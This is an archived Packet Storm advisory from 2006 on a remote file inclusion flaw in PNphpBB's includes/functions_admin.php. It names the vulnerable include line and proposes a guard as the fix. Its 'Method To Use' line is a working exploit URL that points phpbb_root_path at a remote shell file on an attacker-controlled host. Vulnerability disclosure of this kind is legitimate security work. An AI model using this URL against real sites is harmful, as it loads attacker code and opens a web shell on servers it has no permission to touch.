Search...

PNphpBB.txt

2006-09-26T00:00:00

ID PACKETSTORM:50288
Type packetstorm
Reporter AzzCoder
Modified 2006-09-26T00:00:00

Description

                                        
                                            `Vendor: http://www.pnphpbb.com/  
  
Vulnerable File: includes/functions_admin.php  
  
Vulnerable Code:  
  
//The phpbb_root_path isn't initialize  
  
include_once( $phpbb_root_path . 'includes/functions.' . $phpEx );  
  
Method To Use:  
  
http://www.victim.com/[pn_phpbb]/includes/functions_admin.php?phpbb_root_path=http://yourdomain.com/shell.txt?  
  
How To Fix:  
  
Add this code before the include  
  
if ( !defined('IN_PHPBB') )  
{  
die("Hacking attempt");  
}  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:50288", "type": "packetstorm", "bulletinFamily": "exploit", "title": "PNphpBB.txt", "description": "", "published": "2006-09-26T00:00:00", "modified": "2006-09-26T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/50288/PNphpBB.txt.html", "reporter": "AzzCoder", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:28:05", "viewCount": 2, "enchantments": {"score": {"value": -0.5, "vector": "NONE", "modified": "2016-11-03T10:28:05", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:28:05", "rev": 2}, "vulnersScore": -0.5}, "sourceHref": "https://packetstormsecurity.com/files/download/50288/PNphpBB.txt", "sourceData": "`Vendor: http://www.pnphpbb.com/ \n \nVulnerable File: includes/functions_admin.php \n \nVulnerable Code: \n \n//The phpbb_root_path isn't initialize \n \ninclude_once( $phpbb_root_path . 'includes/functions.' . $phpEx ); \n \nMethod To Use: \n \nhttp://www.victim.com/[pn_phpbb]/includes/functions_admin.php?phpbb_root_path=http://yourdomain.com/shell.txt? \n \nHow To Fix: \n \nAdd this code before the include \n \nif ( !defined('IN_PHPBB') ) \n{ \ndie(\"Hacking attempt\"); \n} \n`\n"}